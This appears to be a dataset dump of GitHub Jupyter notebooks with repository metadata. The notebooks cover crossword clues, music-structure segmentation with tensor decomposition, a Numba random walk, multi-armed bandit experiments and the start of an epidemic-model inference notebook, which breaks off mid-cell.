hexsha
stringlengths
40
40
size
int64
6
14.9M
ext
stringclasses
1 value
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
6
260
max_stars_repo_name
stringlengths
6
119
max_stars_repo_head_hexsha
stringlengths
40
41
max_stars_repo_licenses
list
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
6
260
max_issues_repo_name
stringlengths
6
119
max_issues_repo_head_hexsha
stringlengths
40
41
max_issues_repo_licenses
list
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
6
260
max_forks_repo_name
stringlengths
6
119
max_forks_repo_head_hexsha
stringlengths
40
41
max_forks_repo_licenses
list
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
avg_line_length
float64
2
1.04M
max_line_length
int64
2
11.2M
alphanum_fraction
float64
0
1
cells
list
cell_types
list
cell_type_groups
list
cb1bc73fe62b15f7c7471ebe13486f2841e58781
2,528
ipynb
Jupyter Notebook
src/puzzle/examples/crossword_cryptic/pack01_01.ipynb
PhilHarnish/forge
663f19d759b94d84935c14915922070635a4af65
[ "MIT" ]
2
2020-08-18T18:43:09.000Z
2020-08-18T20:05:59.000Z
src/puzzle/examples/crossword_cryptic/pack01_01.ipynb
PhilHarnish/forge
663f19d759b94d84935c14915922070635a4af65
[ "MIT" ]
null
null
null
src/puzzle/examples/crossword_cryptic/pack01_01.ipynb
PhilHarnish/forge
663f19d759b94d84935c14915922070635a4af65
[ "MIT" ]
null
null
null
25.535354
67
0.568038
[ [ [ "import forge\nfrom puzzle.puzzlepedia import puzzlepedia\n\npuzzle = puzzlepedia.parse(\"\"\"\nSam dreamt about European port (9)\nTrash was put by the exit, initially (5)\nJust revenge - sense I'm crazy (7)\nCucumber is a bit tougher, kinked (7)\nLizard, good with Coke, oddly (5)\nFather's attempt to get pie-crust (6)\nHelp in class is trainee (6)\nTakes a chance, right, and skis off (5)\nClimber's aid gives muscular pain (no turning back) (7)\nEdwin's upset about Lloyds' first fraud (7)\nBegin, s-sweet thing! (5)\nInexperienced band intended to limit urban sprawl (5, 4)\nPus-filled swelling: scab's broken round edges of ears (7)\nRarely cooked cut of meat? (5)\nCause of Pacific floods crashing on Nile (2, 4)\nLegal compensation: water barrier takes a long time (7)\nPop, say, made by American stuck in short microphone (5)\nA tree shoot - understand? (4)\nAccompany a very popular former car model (6)\nHe raps odd group of words (6)\nControversial novelist with a hurry to snuff it! (7)\nIn-body device made from tin lamp (7)\nAwful scene about right PC etc. display (6)\nVocalize about large arm support (5)\nPart of a church in Paisley (5)\nExclusive school raising paper money (4)\n\"\"\")", "_____no_output_____" ], [ "puzzlepedia.interact_with(puzzle)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
cb1bc8d524640ca4d845294a0b32533927375b1b
641,762
ipynb
Jupyter Notebook
Notebooks/Notebooks ISMIR 2020/3 - Subdivisions of bars.ipynb
ax-le/MusicNTD
682d67a7b25378200356db5ba9a831e4b05401cb
[ "BSD-3-Clause" ]
null
null
null
Notebooks/Notebooks ISMIR 2020/3 - Subdivisions of bars.ipynb
ax-le/MusicNTD
682d67a7b25378200356db5ba9a831e4b05401cb
[ "BSD-3-Clause" ]
null
null
null
Notebooks/Notebooks ISMIR 2020/3 - Subdivisions of bars.ipynb
ax-le/MusicNTD
682d67a7b25378200356db5ba9a831e4b05401cb
[ "BSD-3-Clause" ]
1
2021-04-07T17:01:54.000Z
2021-04-07T17:01:54.000Z
260.349696
130,716
0.858906
[ [ [ "import musicntd.scripts.hide_code as hide", "C:\\Users\\amarmore\\AppData\\Local\\Continuum\\anaconda3\\envs\\NTD_segmentation\\lib\\site-packages\\librosa\\util\\decorators.py:9: NumbaDeprecationWarning: \u001b[1mAn import was requested from a module that has moved location.\nImport requested from: 'numba.decorators', please update to use 'numba.core.decorators' or pin to Numba version 0.48.0. This alias will not be present in Numba version 0.50.0.\u001b[0m\n from numba.decorators import jit as optional_jit\nC:\\Users\\amarmore\\AppData\\Local\\Continuum\\anaconda3\\envs\\NTD_segmentation\\lib\\site-packages\\librosa\\util\\decorators.py:9: NumbaDeprecationWarning: \u001b[1mAn import was requested from a module that has moved location.\nImport of 'jit' requested from: 'numba.decorators', please update to use 'numba.core.decorators' or pin to Numba version 0.48.0. This alias will not be present in Numba version 0.50.0.\u001b[0m\n from numba.decorators import jit as optional_jit\n" ] ], [ [ "# From padding to subdivision", "_____no_output_____" ], [ "As evoked in the 1st notebook, in previous experiments, every bar of the tensor was zero-padded if it was shorter than the longest bar of the song.\n\nThis fix is not satisfactory, as it creates null artifacts at the end of most of the slices of the tensor.", "_____no_output_____" ], [ "## Description of the subdivision method", "_____no_output_____" ], [ "Instead, we decided to over-sample the chromagram (32-sample hop) and then select the same number of frames in each bar. This way, rather than having equally spaced frames in all bars of the tensor which resulted in slices of the tensor of inequal sizes (before padding), it now computes bar-chromagrams of the same number of frames, which is a parameter to be set. In each bar-chromagram, frames are almost* equally spaced, but the gap between two consecutive frames in two different bars can now be different.\n\nWe call **subdivision** of bars the number of frames we select in each bar. This parameter is to be set, and we will try to evaluate a good parameter in the next part of this notebook.\n\nConcretely, let's consider the chromagram of a particular bar, starting at time $t_0$ and ending at time $t_1$. This chromagram contains $n = (t_1 - t_0 + 1) * \\frac{s_r}{32}$ frames, with $s_r$ the sampling rate. In this chromagram, given a subdivision $sub$, we will select frame at indexes $\\{k * \\frac{n}{sub}$ for $k \\in [0, sub[$ and $k$ integer $\\}$. As indexes need to be integers, we need to round the precedent expression.\n\n*almost, because of the rounding operation presented above", "_____no_output_____" ], [ "# Setting the subdivision parameter\n\nWe will test three values for the subdivision parameter:\n - 96 (24 beats per bar),\n - 128 (32 beats per bar),\n - 192 (48 beats per bar).\n \nWe will test the segmentation on the entire RWC Popular dataset, with MIREX10 annotations, and by testing several ranks (16,24,32,40) for $H$ and $Q$.\n\nNote that, due to the conclusion in Notebook 2, we now have fixed $W$ to the 12-size identity matrix.", "_____no_output_____" ] ], [ [ "# On définit le type d'annotations\nannotations_type = \"MIREX10\"\nranks_rhythm = [16,24,32,40]\nranks_pattern = [16,24,32,40]", "_____no_output_____" ] ], [ [ "## Subdivision 96", "_____no_output_____" ], [ "### Fixed ranks\n\nBelow are segmentation results with the subdivision fixed to 96, for the different ranks values, on the RWC Pop dataset.\n\nResults are computed with tolerance of respectively 0.5 seconds and 3 seconds. ", "_____no_output_____" ] ], [ [ "zero_five_nine, three_nine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = \"chromas\", annotations_type = annotations_type,\n subdivision=96, penalty_weight = 1)", "c:\\users\\amarmore\\desktop\\projects\\phd main projects\\on git\\code\\tensor factorization\\musicntd\\autosimilarity_segmentation.py:43: RuntimeWarning: invalid value encountered in true_divide\n this_array = np.array([list(i/np.linalg.norm(i)) for i in this_array.T]).T\n" ] ], [ [ "### Oracle ranks\n\nIn this condition, we only keep the ranks leading to the highest F measure.\n\nIn that sense, it's an optimistic upper bound on metrics.", "_____no_output_____" ] ], [ [ "hide.printmd(\"**A 0.5 secondes:**\")\nbest_chr_zero_five = hide.best_f_one_score_rank(zero_five_nine)\nhide.printmd(\"**A 3 secondes:**\")\nbest_chr_three = hide.best_f_one_score_rank(three_nine)", "_____no_output_____" ] ], [ [ "Below is presented the distribution of the optimal ranks in the \"oracle ranks\" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.", "_____no_output_____" ] ], [ [ "hide.plot_3d_ranks_study(zero_five_nine, ranks_rhythm, ranks_pattern)", "_____no_output_____" ] ], [ [ "Below is shown the distribution histogram of the F measure obtained with the oracle ranks.", "_____no_output_____" ] ], [ [ "hide.plot_f_mes_histogram(zero_five_nine)", "_____no_output_____" ] ], [ [ "Finally, here are displayed the 5 worst songs in term of F measure in this condition.", "_____no_output_____" ] ], [ [ "hide.return_worst_songs(zero_five_nine, 5)", "_____no_output_____" ] ], [ [ "## Subdivision 128", "_____no_output_____" ], [ "### Fixed ranks\n\nBelow are segmentation results with the subdivision fixed to 128, for the different ranks values, on the RWC Pop dataset.\n\nResults are computed with tolerance of respectively 0.5 seconds and 3 seconds. ", "_____no_output_____" ] ], [ [ "zero_five_cent, three_cent = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = \"chromas\", annotations_type = annotations_type,\n subdivision=128, penalty_weight = 1)", "c:\\users\\amarmore\\desktop\\projects\\phd main projects\\on git\\code\\tensor factorization\\musicntd\\autosimilarity_segmentation.py:43: RuntimeWarning: invalid value encountered in true_divide\n this_array = np.array([list(i/np.linalg.norm(i)) for i in this_array.T]).T\n" ] ], [ [ "### Oracle ranks\n\nIn this condition, we only keep the ranks leading to the highest F measure.\n\nIn that sense, it's an optimistic upper bound.", "_____no_output_____" ] ], [ [ "hide.printmd(\"**A 0.5 secondes:**\")\nbest_chr_zero_five = hide.best_f_one_score_rank(zero_five_cent)\nhide.printmd(\"**A 3 secondes:**\")\nbest_chr_three = hide.best_f_one_score_rank(three_cent)", "_____no_output_____" ] ], [ [ "Below is presented the distribution of the optimal ranks in the \"oracle ranks\" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.", "_____no_output_____" ] ], [ [ "hide.plot_3d_ranks_study(zero_five_cent, ranks_rhythm, ranks_pattern)", "_____no_output_____" ] ], [ [ "Below is shown the distribution histogram of the F measure obtained with the oracle ranks.", "_____no_output_____" ] ], [ [ "hide.plot_f_mes_histogram(zero_five_cent)", "_____no_output_____" ] ], [ [ "Finally, here are displayed the 5 worst songs in term of F measure in this condition.", "_____no_output_____" ] ], [ [ "hide.return_worst_songs(zero_five_cent, 5)", "_____no_output_____" ] ], [ [ "## Subdivision 192", "_____no_output_____" ], [ "### Fixed ranks\n\nBelow are segmentation results with the subdivision fixed to 192, for the different ranks values, on the RWC Pop dataset.\n\nResults are computed with tolerance of respectively 0.5 seconds and 3 seconds. ", "_____no_output_____" ] ], [ [ "zero_five_hunnine, three_hunnine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = \"chromas\", annotations_type = annotations_type,\n subdivision=192, penalty_weight = 1)", "c:\\users\\amarmore\\desktop\\projects\\phd main projects\\on git\\code\\tensor factorization\\musicntd\\autosimilarity_segmentation.py:43: RuntimeWarning: invalid value encountered in true_divide\n this_array = np.array([list(i/np.linalg.norm(i)) for i in this_array.T]).T\n" ] ], [ [ "### Oracle ranks\n\nIn this condition, we only keep the ranks leading to the highest F measure.\n\nIn that sense, it's an optimistic upper bound.", "_____no_output_____" ] ], [ [ "hide.printmd(\"**A 0.5 secondes:**\")\nbest_chr_zero_five = hide.best_f_one_score_rank(zero_five_hunnine)\nhide.printmd(\"**A 3 secondes:**\")\nbest_chr_three = hide.best_f_one_score_rank(three_hunnine)", "_____no_output_____" ] ], [ [ "Below is presented the distribution of the optimal ranks in the \"oracle ranks\" condition, _i.e._ the distribution of the ranks for $H$ and $Q$ which result in the highest F measure for the different songs.", "_____no_output_____" ] ], [ [ "hide.plot_3d_ranks_study(zero_five_hunnine, ranks_rhythm, ranks_pattern)", "_____no_output_____" ] ], [ [ "Below is shown the distribution histogram of the F measure obtained with the oracle ranks.", "_____no_output_____" ] ], [ [ "hide.plot_f_mes_histogram(zero_five_hunnine)", "_____no_output_____" ] ], [ [ "Finally, here are displayed the 5 worst songs in term of F measure in this condition.", "_____no_output_____" ] ], [ [ "hide.return_worst_songs(zero_five_hunnine, 5)", "_____no_output_____" ] ], [ [ "# Conclusion", "_____no_output_____" ], [ "We didn't find the difference in the segmentation results to be significative.\n\nIn that sense, we concluded that the three tested subdivisions were equally satisfying for our experiments, and we decided to pursue with the **96** subdivision only, in order to reduce computation time and complexity, as it is the smallest tested value.\n\n96 also presents the advantage (compared to 128) to be divisible by 3 and 4, which are the most common number of beats per bar in western pop music (even if, for now, we have restricted our study to music with 4 beats per bar).", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ] ]
cb1bd40de992f8f6d3673a65ed72e10573b47f87
131,945
ipynb
Jupyter Notebook
Numba/02_random_walk.ipynb
enricocid/python_gis
031462b370781acb2bb429a1027088fd381bce5b
[ "CC-BY-4.0" ]
7
2021-09-27T16:36:43.000Z
2021-12-10T21:03:52.000Z
Numba/02_random_walk.ipynb
enricocid/python_gis
031462b370781acb2bb429a1027088fd381bce5b
[ "CC-BY-4.0" ]
null
null
null
Numba/02_random_walk.ipynb
enricocid/python_gis
031462b370781acb2bb429a1027088fd381bce5b
[ "CC-BY-4.0" ]
6
2021-10-02T17:49:24.000Z
2021-12-02T20:06:06.000Z
999.583333
128,510
0.954519
[ [ [ "import numpy as np\nfrom numba import jit\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as pe\n\nplt.style.use('default')", "_____no_output_____" ] ], [ [ "<b> Numba implementation of Random Walk (2D) in 8 directions </b>\n<br>\n[Adapted from: geeksforgeeks](https://www.geeksforgeeks.org/random-walk-implementation-python/)", "_____no_output_____" ] ], [ [ "@jit(nopython=True)\ndef random_walk_2d_n8(nwalks):\n # Arrays to store x, y coordinates\n x = np.zeros(nwalks)\n y = np.zeros(nwalks)\n \n # 8 directions\n n8 = [(-1,-1), (-1,0), (-1,1), (0,-1), (0,1), (1,-1), (1,0), (1,1)]\n for n in range(nwalks):\n idx = np.random.choice(len(n8), 1)[0]\n x[n] = x[n - 1] + n8[idx][0]\n y[n] = y[n - 1] + n8[idx][1] \n return x, y", "_____no_output_____" ], [ "x, y = random_walk_2d_n8(nwalks=10000000)", "_____no_output_____" ], [ "# Show the result\nfig, ax = plt.subplots()\nax.set_title(\"Random walk (2D) - 8 directions\")\n\n# Plot the lines\nax.plot(x, y, lw= 0.05)\n\n# Start point\nax.scatter(x[0], y[0], zorder=5, c=\"k\")\nax.annotate(\"Start\", (x[0] + 100, y[0]), zorder=5, c=\"k\", weight=\"bold\",\n path_effects=[pe.withStroke(linewidth=2, foreground=\"white\")])\n# End point\nax.scatter(x[-1], y[-1], zorder=5, c=\"k\")\nax.annotate(\"End\", (x[-1] + 100, y[-1]), zorder=5, c=\"k\", weight=\"bold\",\n path_effects=[pe.withStroke(linewidth=2, foreground=\"white\")])\n\nax.grid(linewidth=0.3)\nplt.tight_layout()", "_____no_output_____" ] ], [ [ "<b> Numba vs Loop: 10M walks </b>\n\n%%timeit results with @jit(nopython=True) decorator:<br>\n😍 <b>Numba</b>: 1.15 s ± 29.5 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)\n\n%%timeit results without @jit(nopython=True) decorator:<br>\n😴 <b>Loop</b>: 3min 33s ± 11.9 s per loop (mean ± std. dev. of 7 runs, 1 loop each)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ] ]
cb1be4f0abba0092455f88e08cb7ede33160d72a
283,743
ipynb
Jupyter Notebook
chapter02/ten_armed_testbed.ipynb
leeyt/reinforcement-learning-an-introduction
ec46e9aec05e5ba918ca3b2216b8681b37666cab
[ "Apache-2.0" ]
null
null
null
chapter02/ten_armed_testbed.ipynb
leeyt/reinforcement-learning-an-introduction
ec46e9aec05e5ba918ca3b2216b8681b37666cab
[ "Apache-2.0" ]
null
null
null
chapter02/ten_armed_testbed.ipynb
leeyt/reinforcement-learning-an-introduction
ec46e9aec05e5ba918ca3b2216b8681b37666cab
[ "Apache-2.0" ]
1
2022-02-10T13:41:30.000Z
2022-02-10T13:41:30.000Z
513.097649
127,434
0.925838
[ [ [ "#######################################################################\n# Copyright (C) #\n# 2016-2018 Shangtong Zhang([email protected]) #\n# 2016 Tian Jun([email protected]) #\n# 2016 Artem Oboturov([email protected]) #\n# 2016 Kenta Shimada([email protected]) #\n# Permission given to modify the code as long as you keep this #\n# declaration at the top #\n#######################################################################", "_____no_output_____" ], [ "import matplotlib\nmatplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nimport numpy as np\nfrom tqdm import tqdm", "_____no_output_____" ], [ "class Bandit:\n # @k_arm: # of arms\n # @epsilon: probability for exploration in epsilon-greedy algorithm\n # @initial: initial estimation for each action\n # @step_size: constant step size for updating estimations\n # @sample_averages: if True, use sample averages to update estimations instead of constant step size\n # @UCB_param: if not None, use UCB algorithm to select action\n # @gradient: if True, use gradient based bandit algorithm\n # @gradient_baseline: if True, use average reward as baseline for gradient based bandit algorithm\n def __init__(self, k_arm=10, epsilon=0., initial=0., step_size=0.1, sample_averages=False, UCB_param=None,\n gradient=False, gradient_baseline=False, true_reward=0.):\n self.k = k_arm\n self.step_size = step_size\n self.sample_averages = sample_averages\n self.indices = np.arange(self.k)\n self.time = 0\n self.UCB_param = UCB_param\n self.gradient = gradient\n self.gradient_baseline = gradient_baseline\n self.average_reward = 0\n self.true_reward = true_reward\n self.epsilon = epsilon\n self.initial = initial\n\n def reset(self):\n # real reward for each action\n self.q_true = np.random.randn(self.k) + self.true_reward\n\n # estimation for each action\n self.q_estimation = np.zeros(self.k) + self.initial\n\n # # of chosen times for each action\n self.action_count = np.zeros(self.k)\n\n self.best_action = np.argmax(self.q_true)\n\n # get an action for this bandit\n def act(self):\n if np.random.rand() < self.epsilon:\n return np.random.choice(self.indices)\n\n if self.UCB_param is not None:\n UCB_estimation = self.q_estimation + \\\n self.UCB_param * np.sqrt(np.log(self.time + 1) / (self.action_count + 1e-5))\n q_best = np.max(UCB_estimation)\n return np.random.choice([action for action, q in enumerate(UCB_estimation) if q == q_best])\n\n if self.gradient:\n exp_est = np.exp(self.q_estimation)\n self.action_prob = exp_est / np.sum(exp_est)\n return np.random.choice(self.indices, p=self.action_prob)\n\n return np.argmax(self.q_estimation)\n\n # take an action, update estimation for this action\n def step(self, action):\n # generate the reward under N(real reward, 1)\n reward = np.random.randn() + self.q_true[action]\n self.time += 1\n self.average_reward = (self.time - 1.0) / self.time * self.average_reward + reward / self.time\n self.action_count[action] += 1\n\n if self.sample_averages:\n # update estimation using sample averages\n self.q_estimation[action] += 1.0 / self.action_count[action] * (reward - self.q_estimation[action])\n elif self.gradient:\n one_hot = np.zeros(self.k)\n one_hot[action] = 1\n if self.gradient_baseline:\n baseline = self.average_reward\n else:\n baseline = 0\n self.q_estimation = self.q_estimation + self.step_size * (reward - baseline) * (one_hot - self.action_prob)\n else:\n # update estimation with constant step size\n self.q_estimation[action] += self.step_size * (reward - self.q_estimation[action])\n return reward", "_____no_output_____" ], [ "def simulate(runs, time, bandits):\n best_action_counts = np.zeros((len(bandits), runs, time))\n rewards = np.zeros(best_action_counts.shape)\n for i, bandit in enumerate(bandits):\n for r in tqdm(range(runs)):\n bandit.reset()\n for t in range(time):\n action = bandit.act()\n reward = bandit.step(action)\n rewards[i, r, t] = reward\n if action == bandit.best_action:\n best_action_counts[i, r, t] = 1\n best_action_counts = best_action_counts.mean(axis=1)\n rewards = rewards.mean(axis=1)\n return best_action_counts, rewards", "_____no_output_____" ], [ "def figure_2_1():\n plt.violinplot(dataset=np.random.randn(200,10) + np.random.randn(10))\n plt.xlabel(\"Action\")\n plt.ylabel(\"Reward distribution\")\n plt.show()\n \nfigure_2_1()", "_____no_output_____" ], [ "def figure_2_2(runs=2000, time=1000):\n epsilons = [0, 0.1, 0.01]\n bandits = [Bandit(epsilon=eps, sample_averages=True) for eps in epsilons]\n best_action_counts, rewards = simulate(runs, time, bandits)\n\n plt.figure(figsize=(10, 20))\n\n plt.subplot(2, 1, 1)\n for eps, rewards in zip(epsilons, rewards):\n plt.plot(rewards, label='epsilon = %.02f' % (eps))\n plt.xlabel('steps')\n plt.ylabel('average reward')\n plt.legend()\n\n plt.subplot(2, 1, 2)\n for eps, counts in zip(epsilons, best_action_counts):\n plt.plot(counts, label='epsilon = %.02f' % (eps))\n plt.xlabel('steps')\n plt.ylabel('% optimal action')\n plt.legend()\n\n plt.show()\n \nfigure_2_2()", "100%|██████████| 2000/2000 [00:21<00:00, 95.09it/s] \n100%|██████████| 2000/2000 [00:17<00:00, 114.55it/s]\n100%|██████████| 2000/2000 [00:18<00:00, 106.24it/s]\n" ], [ "def figure_2_3(runs=2000, time=1000):\n bandits = []\n bandits.append(Bandit(epsilon=0, initial=5, step_size=0.1))\n bandits.append(Bandit(epsilon=0.1, initial=0, step_size=0.1))\n best_action_counts, _ = simulate(runs, time, bandits)\n\n plt.plot(best_action_counts[0], label='epsilon = 0, q = 5')\n plt.plot(best_action_counts[1], label='epsilon = 0.1, q = 0')\n plt.xlabel('Steps')\n plt.ylabel('% optimal action')\n plt.legend()\n\n plt.show()\n \nfigure_2_3()", "100%|██████████| 2000/2000 [00:16<00:00, 120.66it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 113.55it/s]\n" ], [ "def figure_2_4(runs=2000, time=1000):\n bandits = []\n bandits.append(Bandit(epsilon=0, UCB_param=2, sample_averages=True))\n bandits.append(Bandit(epsilon=0.1, sample_averages=True))\n _, average_rewards = simulate(runs, time, bandits)\n\n plt.plot(average_rewards[0], label='UCB c = 2')\n plt.plot(average_rewards[1], label='epsilon greedy epsilon = 0.1')\n plt.xlabel('Steps')\n plt.ylabel('Average reward')\n plt.legend()\n\n plt.show()\n\nfigure_2_4()", "100%|██████████| 2000/2000 [01:38<00:00, 20.41it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 111.15it/s]\n" ], [ "def figure_2_5(runs=2000, time=1000):\n bandits = []\n bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=True, true_reward=4))\n bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=False, true_reward=4))\n bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=True, true_reward=4))\n bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=False, true_reward=4))\n best_action_counts, _ = simulate(runs, time, bandits)\n labels = ['alpha = 0.1, with baseline',\n 'alpha = 0.1, without baseline',\n 'alpha = 0.4, with baseline',\n 'alpha = 0.4, without baseline']\n\n for i in range(0, len(bandits)):\n plt.plot(best_action_counts[i], label=labels[i])\n plt.xlabel('Steps')\n plt.ylabel('% Optimal action')\n plt.legend()\n\n plt.show()\n\nfigure_2_5()", "100%|██████████| 2000/2000 [02:15<00:00, 14.72it/s]\n100%|██████████| 2000/2000 [02:23<00:00, 13.92it/s]\n100%|██████████| 2000/2000 [02:07<00:00, 15.65it/s]\n100%|██████████| 2000/2000 [02:16<00:00, 14.68it/s]\n" ], [ "def figure_2_6(runs=2000, time=1000):\n labels = ['epsilon-greedy', 'gradient bandit',\n 'UCB', 'optimistic initialization']\n generators = [lambda epsilon: Bandit(epsilon=epsilon, sample_averages=True),\n lambda alpha: Bandit(gradient=True, step_size=alpha, gradient_baseline=True),\n lambda coef: Bandit(epsilon=0, UCB_param=coef, sample_averages=True),\n lambda initial: Bandit(epsilon=0, initial=initial, step_size=0.1)]\n parameters = [np.arange(-7, -1, dtype=np.float),\n np.arange(-5, 2, dtype=np.float),\n np.arange(-4, 3, dtype=np.float),\n np.arange(-2, 3, dtype=np.float)]\n\n bandits = []\n for generator, parameter in zip(generators, parameters):\n for param in parameter:\n bandits.append(generator(pow(2, param)))\n\n _, average_rewards = simulate(runs, time, bandits)\n rewards = np.mean(average_rewards, axis=1)\n\n i = 0\n for label, parameter in zip(labels, parameters):\n l = len(parameter)\n plt.plot(parameter, rewards[i:i+l], label=label)\n i += l\n plt.xlabel('Parameter(2^x)')\n plt.ylabel('Average reward')\n plt.legend()\n\n plt.show()\n\nfigure_2_6()", "100%|██████████| 2000/2000 [00:16<00:00, 122.12it/s]\n100%|██████████| 2000/2000 [00:20<00:00, 96.76it/s] \n100%|██████████| 2000/2000 [00:21<00:00, 94.87it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 117.48it/s]\n100%|██████████| 2000/2000 [00:20<00:00, 99.63it/s] \n100%|██████████| 2000/2000 [00:19<00:00, 101.89it/s]\n100%|██████████| 2000/2000 [02:16<00:00, 14.66it/s]\n100%|██████████| 2000/2000 [02:13<00:00, 14.98it/s]\n100%|██████████| 2000/2000 [02:55<00:00, 11.40it/s]\n100%|██████████| 2000/2000 [02:21<00:00, 14.09it/s]\n100%|██████████| 2000/2000 [02:14<00:00, 14.85it/s]\n100%|██████████| 2000/2000 [02:10<00:00, 15.28it/s]\n100%|██████████| 2000/2000 [02:13<00:00, 15.02it/s]\n100%|██████████| 2000/2000 [01:34<00:00, 21.17it/s]\n100%|██████████| 2000/2000 [01:38<00:00, 20.31it/s]\n100%|██████████| 2000/2000 [01:36<00:00, 20.79it/s]\n100%|██████████| 2000/2000 [01:35<00:00, 21.02it/s]\n100%|██████████| 2000/2000 [01:41<00:00, 19.73it/s]\n100%|██████████| 2000/2000 [01:34<00:00, 21.08it/s]\n100%|██████████| 2000/2000 [01:44<00:00, 19.11it/s]\n100%|██████████| 2000/2000 [00:19<00:00, 104.63it/s]\n100%|██████████| 2000/2000 [00:16<00:00, 120.18it/s]\n100%|██████████| 2000/2000 [00:16<00:00, 118.26it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 115.52it/s]\n100%|██████████| 2000/2000 [00:16<00:00, 121.23it/s]\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1be7953ddc781bfd7c45a8c383198eb5c09f73
548,316
ipynb
Jupyter Notebook
SimpleTestModel/synthInfTest-pop1e6-win2.ipynb
rljack2002/infExampleCovidEW
351e0605c80a51a2cd285136d7a05d969ac6c6fd
[ "MIT" ]
2
2020-10-28T17:01:05.000Z
2020-10-30T11:07:20.000Z
SimpleTestModel/synthInfTest-pop1e6-win2.ipynb
rljack2002/infExampleCovidEW
351e0605c80a51a2cd285136d7a05d969ac6c6fd
[ "MIT" ]
null
null
null
SimpleTestModel/synthInfTest-pop1e6-win2.ipynb
rljack2002/infExampleCovidEW
351e0605c80a51a2cd285136d7a05d969ac6c6fd
[ "MIT" ]
null
null
null
512.924228
149,068
0.938793
[ [ [ "## inference in simple model using synthetic data\npopulation size 10^6, inference window 2x4 = 8 days, to be compared with ``-win5`` analogous notebook ", "_____no_output_____" ] ], [ [ "%env OMP_NUM_THREADS=1", "env: OMP_NUM_THREADS=1\n" ], [ "%matplotlib inline\nimport numpy as np\nimport os\nimport pickle\nimport pprint\nimport time\n\nimport pyross\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n#from matplotlib import rc; rc('text', usetex=True)\n\nimport synth_fns", "_____no_output_____" ] ], [ [ "(cell 3 was removed to hide local file info)\n### main settings", "_____no_output_____" ] ], [ [ "## for dataFiles : needs a fresh value in every notebook\nfileRoot = 'dataSynthInfTest-pop1e6-win2'\n\n## total population\npopN = 1e6\n\n## tau-leaping param, take this negative to force gillespie\n## or set a small value for high-accuracy tau-leap (eg 1e-4 or 1e-5)\nleapEps = -1\n\n## do we use small tolerances for the likelihood computations? (use False for debug etc)\nisHighAccuracy = True\n\n# absolute tolerance for logp for MAP \ninf_atol = 1.0\n\n## prior mean of beta, divided by true value (set to 1.0 for the simplest case)\nbetaPriorOffset = 0.8\nbetaPriorLogNorm = False\n\n## mcmc\nmcSamples = 5000\nnProcMCMC = 2 # None ## take None to use default but large numbers are not efficient in this example", "_____no_output_____" ], [ "trajSeed = 18\ninfSeed = 21\nmcSeed = infSeed+2\n\nloadTraj = False\nsaveMC = True", "_____no_output_____" ] ], [ [ "### model", "_____no_output_____" ] ], [ [ "model_dict = synth_fns.get_model(popN)\n\nmodel_spec = model_dict['mod']\ncontactMatrix = model_dict['CM']\nparameters_true = model_dict['params']\ncohortsM = model_dict['cohortsM']\nNi = model_dict['cohortsPop']", "_____no_output_____" ] ], [ [ "#### more settings", "_____no_output_____" ] ], [ [ "## total trajectory time (bare units)\nTf_bare = 20\n## total inf time\nTf_inf_bare = 2\n\n## inference period starts when the total deaths reach this amount (as a fraction)\nfracDeaths = 2e-3 # int(N*200/1e5)\n", "_____no_output_____" ], [ "## hack to get higher-frequency data\n## how many data points per \"timestep\" (in original units)\nfineData = 4\n\n## this assumes that all parameters are rates !!\nfor key in parameters_true:\n #print(key,parameters_true[key])\n parameters_true[key] /= fineData\n\nTf = Tf_bare * fineData; \nNf = Tf+1\n\nTf_inference = Tf_inf_bare * fineData\nNf_inference = Tf_inference+1", "_____no_output_____" ] ], [ [ "### plotting helper functions", "_____no_output_____" ] ], [ [ "def plotTraj(M,data_array,Nf_start,Tf_inference,fineData):\n fig = plt.figure(num=None, figsize=(6, 4), dpi=80, facecolor='w', edgecolor='k')\n #plt.rc('text', usetex=True)\n plt.rc('font', family='serif', size=12)\n t = np.linspace(0, Tf/fineData, 